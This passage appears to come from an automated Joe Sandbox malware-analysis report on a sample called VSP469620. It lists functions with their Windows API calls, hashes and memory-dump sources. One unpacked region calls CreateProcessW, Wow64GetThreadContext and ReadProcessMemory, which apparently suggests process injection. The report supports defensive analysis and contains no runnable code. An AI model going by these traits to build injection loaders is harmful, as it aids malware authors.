                                                              • Opcode Fuzzy Hash: 0abac1eb251ab8268307162da2affca0dd5bf0b85642aa5c099b32ea940796fc
                                                              • Instruction Fuzzy Hash: AC11C2729056118ED316FF68CA4131C7AA06F813B2F264343E4275F3F3DBB48C4086A1
                                                              Function 00ACF4EA Relevance: 3.0, APIs: 2, Instructions: 43COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00AD395C: __FF_MSGBANNER.LIBCMT ref: 00AD3973
                                                                • Part of subcall function 00AD395C: __NMSG_WRITE.LIBCMT ref: 00AD397A
                                                                • Part of subcall function 00AD395C: RtlAllocateHeap.NTDLL(00C70000,00000000,00000001,00000001,00000000,?,?,00ACF507,?,0000000E), ref: 00AD399F
                                                              • std::exception::exception.LIBCMT ref: 00ACF51E
                                                              • __CxxThrowException@8.LIBCMT ref: 00ACF533
                                                                • Part of subcall function 00AD6805: RaiseException.KERNEL32(?,?,0000000E,00B66A30,?,?,?,00ACF538,0000000E,00B66A30,?,00000001), ref: 00AD6856
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                              • String ID:
                                                              • API String ID: 3902256705-0
                                                              • Opcode ID: 358366c1e69463fe1662d80f2fc9dc35bffb28a79a0fe7d5316b23b0aa3074f9
                                                              • Instruction ID: 25f745567314379c046fc1f365be64852d1ac2e803ab3646306da0726abe56a4
                                                              • Opcode Fuzzy Hash: 358366c1e69463fe1662d80f2fc9dc35bffb28a79a0fe7d5316b23b0aa3074f9
                                                              • Instruction Fuzzy Hash: 3EF0C87210421D6BDB04BF98EE11EDE77ED9F00354F70446AFA05E2281DBB1D64097A5
                                                              Function 00AD35E4 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00AD7C0E: __getptd_noexit.LIBCMT ref: 00AD7C0E
                                                              • __lock_file.LIBCMT ref: 00AD3629
                                                                • Part of subcall function 00AD4E1C: __lock.LIBCMT ref: 00AD4E3F
                                                              • __fclose_nolock.LIBCMT ref: 00AD3634
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                              • String ID:
                                                              • API String ID: 2800547568-0
                                                              • Opcode ID: 04a012d5f4d45c2b29894b6cd55285ad89340faa419e81de9abffae83781de4f
                                                              • Instruction ID: 49b757086d389b8d5cd1cca06260e4dfd0df1526fae8b26b78263fb4d690da0e
                                                              • Opcode Fuzzy Hash: 04a012d5f4d45c2b29894b6cd55285ad89340faa419e81de9abffae83781de4f
                                                              • Instruction Fuzzy Hash: E0F09072801204AADB116B65890276FBBA06F41730F25815BE423AB3D1CB7CCA019A96
                                                              Function 00E8648D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateProcessW.KERNELBASE(?,00000000), ref: 00E86C4B
                                                              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00E86CE1
                                                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00E86D03
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303683207.0000000000E85000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E85000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_e85000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                              • String ID:
                                                              • API String ID: 2438371351-0
                                                              • Opcode ID: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                                                              • Instruction ID: d1f76279e7afd887df86a38ba483954784b378a3e9e28f69cbd1e1008675db37
                                                              • Opcode Fuzzy Hash: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                                                              • Instruction Fuzzy Hash: 0F12C024E14658C6EB24DF64D8507DEB232EF68300F1064E9910DEB7A5E77A4F81CF5A
                                                              Function 00AD2957 Relevance: 1.6, APIs: 1, Instructions: 135COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __flush.LIBCMT ref: 00AD2A0B
                                                                • Part of subcall function 00AD7C0E: __getptd_noexit.LIBCMT ref: 00AD7C0E
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: __flush__getptd_noexit
                                                              • String ID:
                                                              • API String ID: 4101623367-0
                                                              • Opcode ID: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                              • Instruction ID: 782dc2ae5ae75557d7f941eba3e7a06d7679c098790fa0a1fa004a80a8761394
                                                              • Opcode Fuzzy Hash: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                              • Instruction Fuzzy Hash: A841A4706007069FDB288F69C9906AEB7B6EF643A0B24852FE857C7350EB70DD40CB50
                                                              Function 00ACED18 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: ProtectVirtual
                                                              • String ID:
                                                              • API String ID: 544645111-0
                                                              • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                              • Instruction ID: c68f378df8dee10d699f5b60d69ee54eca54da2ce819daafc6db4d21d2859d19
                                                              • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                              • Instruction Fuzzy Hash: 4531C775A00105DBDB1ADF58C480A69FBB6FF49340B6686A9E40ACB256DB31EDC1CB90
                                                              Function 00B1040F Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: _free
                                                              • String ID:
                                                              • API String ID: 269201875-0
                                                              • Opcode ID: bb078f6b3ccc7a05a921a6cf699553db54adf086d39d0e28fd346298c3f3c248
                                                              • Instruction ID: 7a916ac049a82d9a4f348744bdb1463938163b5290e240a4780b0f850c83a1ad
                                                              • Opcode Fuzzy Hash: bb078f6b3ccc7a05a921a6cf699553db54adf086d39d0e28fd346298c3f3c248
                                                              • Instruction Fuzzy Hash: F9319E75204528DFCB01AF10D1D0BAE7BB1FF58320F61848AEA951B386DBB4A985CF81
                                                              Function 00B29A75 Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: ClearVariant
                                                              • String ID:
                                                              • API String ID: 1473721057-0
                                                              • Opcode ID: b77116e216c21c67f79c1bcc7e66980ca1b7dc3fb967742f7a860755b4ef5b74
                                                              • Instruction ID: af1b93baaa59d34dd6674b2ada873af5d6233197a0cc629cad69d44d3eaccd64
                                                              • Opcode Fuzzy Hash: b77116e216c21c67f79c1bcc7e66980ca1b7dc3fb967742f7a860755b4ef5b74
                                                              • Instruction Fuzzy Hash: E3413870608655CFDB24DF18C484F1ABBF1AF45304F1A89ACE99A4B362C772E845CF52
                                                              Function 00AB41A9 Relevance: 1.6, APIs: 1, Instructions: 63libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00AB4214: FreeLibrary.KERNEL32(00000000,?), ref: 00AB4247
                                                              • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,00AB39FE,?,00000001), ref: 00AB41DB
                                                                • Part of subcall function 00AB4291: FreeLibrary.KERNEL32(00000000), ref: 00AB42C4
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Library$Free$Load
                                                              • String ID:
                                                              • API String ID: 2391024519-0
                                                              • Opcode ID: 27f5ab7cf0c41360f75700fc8ae6e604dde9b96cf7357b66449772effe774cae
                                                              • Instruction ID: 8d52e72fe6b535cb05b10af23970903088075f902495086bec3e90117c7a8d0b
                                                              • Opcode Fuzzy Hash: 27f5ab7cf0c41360f75700fc8ae6e604dde9b96cf7357b66449772effe774cae
                                                              • Instruction Fuzzy Hash: E1119131610316BADB14AB74DE06BEE77ED9F44700F108429B596AA183EB74DA04AB61
                                                              Function 00B29B45 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: ClearVariant
                                                              • String ID:
                                                              • API String ID: 1473721057-0
                                                              • Opcode ID: 62764ef042fd9d3d77a6f6e09e6f145306d299ae052d2c9dad32d86cf49cf99a
                                                              • Instruction ID: 1dbfbf047f7d401e22fd306aa3bd543cde1cc70c3d283d872541f196123f9357
                                                              • Opcode Fuzzy Hash: 62764ef042fd9d3d77a6f6e09e6f145306d299ae052d2c9dad32d86cf49cf99a
                                                              • Instruction Fuzzy Hash: FA212570608605CFDB24DF68C544F1ABBF1BF84304F1689ACEA9A4B222C732E845CF52
                                                              Function 00ADAF61 Relevance: 1.6, APIs: 1, Instructions: 56COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • ___lock_fhandle.LIBCMT ref: 00ADAFC0
                                                                • Part of subcall function 00AD7BDA: __getptd_noexit.LIBCMT ref: 00AD7BDA
                                                                • Part of subcall function 00AD7C0E: __getptd_noexit.LIBCMT ref: 00AD7C0E
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: __getptd_noexit$___lock_fhandle
                                                              • String ID:
                                                              • API String ID: 1144279405-0
                                                              • Opcode ID: c1c26ea70c34ff6b77c1d03b22ccc18363ad2d7c74378bddc9ad402417018e29
                                                              • Instruction ID: 6ee3c73922338825862511abd76baa06f87545bf226f14302a73432057c0fe2e
                                                              • Opcode Fuzzy Hash: c1c26ea70c34ff6b77c1d03b22ccc18363ad2d7c74378bddc9ad402417018e29
                                                              • Instruction Fuzzy Hash: 75119D728246009FD7167FA88A0276E3A60AF41331F164283E4374F3E2DBB989408BB1
                                                              Function 00AB39DB Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad
                                                              • String ID:
                                                              • API String ID: 1029625771-0
                                                              • Opcode ID: e908df7db2011151d19b897d4a4948494f90a1a3426dd436a38c65c5f4b6a17e
                                                              • Instruction ID: 619ef35abbd8126dbfa87c9e614d01f0fb4a4627f91c9eb26a5f239da6f4678b
                                                              • Opcode Fuzzy Hash: e908df7db2011151d19b897d4a4948494f90a1a3426dd436a38c65c5f4b6a17e
                                                              • Instruction Fuzzy Hash: FF01493150010DBFCF05EFA4C9918FEBB78EF14344F108169B56697197EA319A49DF60
                                                              Function 00AD2AAE Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __lock_file.LIBCMT ref: 00AD2AED
                                                                • Part of subcall function 00AD7C0E: __getptd_noexit.LIBCMT ref: 00AD7C0E
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: __getptd_noexit__lock_file
                                                              • String ID:
                                                              • API String ID: 2597487223-0
                                                              • Opcode ID: 0059413129f7ebf8cbcf8e15d4cb65d05cf24a0d298b265a56f3dbc36a6a93d7
                                                              • Instruction ID: 44c1b7f30c384026ede7a352b4b55aa6fc0f2a29133e98a94ac9571f95fb1fc6
                                                              • Opcode Fuzzy Hash: 0059413129f7ebf8cbcf8e15d4cb65d05cf24a0d298b265a56f3dbc36a6a93d7
                                                              • Instruction Fuzzy Hash: 68F09035A00205EBEF21AF748E067DF3BA5BF10360F158417F4169B3A1DBB88A52DB51
                                                              Function 00AB4252 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FreeLibrary.KERNEL32(?,?,?,?,?,00AB39FE,?,00000001), ref: 00AB4286
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: FreeLibrary
                                                              • String ID:
                                                              • API String ID: 3664257935-0
                                                              • Opcode ID: c064453ef0574752fedac1973b106a277ce8df65c94e1c40a1b158e90f820221
                                                              • Instruction ID: 2babddca3b1dd1bca35ec6358ba49f815df941e4546b08e673430bd058029937
                                                              • Opcode Fuzzy Hash: c064453ef0574752fedac1973b106a277ce8df65c94e1c40a1b158e90f820221
                                                              • Instruction Fuzzy Hash: F5F039B1505702CFCB349F64E890896BBF8BF183253248A3EF1D682613C772A840EF50
                                                              Function 00AB40A7 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00AB40C6
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: LongNamePath
                                                              • String ID:
                                                              • API String ID: 82841172-0
                                                              • Opcode ID: 4f9d8ed6fecbfec129a882cbf24f7ec255f962ac943deb1a713ee5b41143858d
                                                              • Instruction ID: 0d7b8381121ba95a4b6683cc8eb1c35f8264abb15b81447df878cbd7ca53f21a
                                                              • Opcode Fuzzy Hash: 4f9d8ed6fecbfec129a882cbf24f7ec255f962ac943deb1a713ee5b41143858d
                                                              • Instruction Fuzzy Hash: E9E0C2366002245BCB11A658DC46FEF77ADDF886A0F0901B6F90AE7244DEA4AE819690
                                                              Function 00E8748C Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Sleep.KERNELBASE(000001F4), ref: 00E874A1
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303683207.0000000000E85000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E85000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_e85000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Sleep
                                                              • String ID:
                                                              • API String ID: 3472027048-0
                                                              • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                              • Instruction ID: a7c29b395fda24089b03446b995aa55a031b6c6432f56b5f4b1ef1809872210b
                                                              • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                              • Instruction Fuzzy Hash: 9AE09A7494410DAFDB00EFA4D94969E7FB4EF04301F1045A5FD05E6680DA309E548A62
                                                              Function 00E87490 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Sleep.KERNELBASE(000001F4), ref: 00E874A1
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303683207.0000000000E85000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E85000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_e85000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Sleep
                                                              • String ID:
                                                              • API String ID: 3472027048-0
                                                              • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                              • Instruction ID: f1ba49cf32f7ec9c6254073ae036b9abef1569c8d0e3b14309cb907c753b94ac
                                                              • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                              • Instruction Fuzzy Hash: A3E0E67494410DDFDB00EFF4D94969E7FB4EF04301F104565FD05E2280D6309D508A72

                                                              Non-executed Functions

                                                              Function 00B1F7FF Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 630windowkeyboardCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00ACB34E: GetWindowLongW.USER32(?,000000EB), ref: 00ACB35F
                                                              • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 00B1F87D
                                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00B1F8DC
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00B1F919
                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00B1F940
                                                              • SendMessageW.USER32 ref: 00B1F966
                                                              • _wcsncpy.LIBCMT ref: 00B1F9D2
                                                              • GetKeyState.USER32(00000011), ref: 00B1F9F3
                                                              • GetKeyState.USER32(00000009), ref: 00B1FA00
                                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00B1FA16
                                                              • GetKeyState.USER32(00000010), ref: 00B1FA20
                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00B1FA4F
                                                              • SendMessageW.USER32 ref: 00B1FA72
                                                              • SendMessageW.USER32(?,00001030,?,00B1E059), ref: 00B1FB6F
                                                              • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 00B1FB85
                                                              • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00B1FB96
                                                              • SetCapture.USER32(?), ref: 00B1FB9F
                                                              • ClientToScreen.USER32(?,?), ref: 00B1FC03
                                                              • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00B1FC0F
                                                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 00B1FC29
                                                              • ReleaseCapture.USER32 ref: 00B1FC34
                                                              • GetCursorPos.USER32(?), ref: 00B1FC69
                                                              • ScreenToClient.USER32(?,?), ref: 00B1FC76
                                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 00B1FCD8
                                                              • SendMessageW.USER32 ref: 00B1FD02
                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00B1FD41
                                                              • SendMessageW.USER32 ref: 00B1FD6C
                                                              • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00B1FD84
                                                              • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00B1FD8F
                                                              • GetCursorPos.USER32(?), ref: 00B1FDB0
                                                              • ScreenToClient.USER32(?,?), ref: 00B1FDBD
                                                              • GetParent.USER32(?), ref: 00B1FDD9
                                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 00B1FE3F
                                                              • SendMessageW.USER32 ref: 00B1FE6F
                                                              • ClientToScreen.USER32(?,?), ref: 00B1FEC5
                                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00B1FEF1
                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00B1FF19
                                                              • SendMessageW.USER32 ref: 00B1FF3C
                                                              • ClientToScreen.USER32(?,?), ref: 00B1FF86
                                                              • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00B1FFB6
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00B2004B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
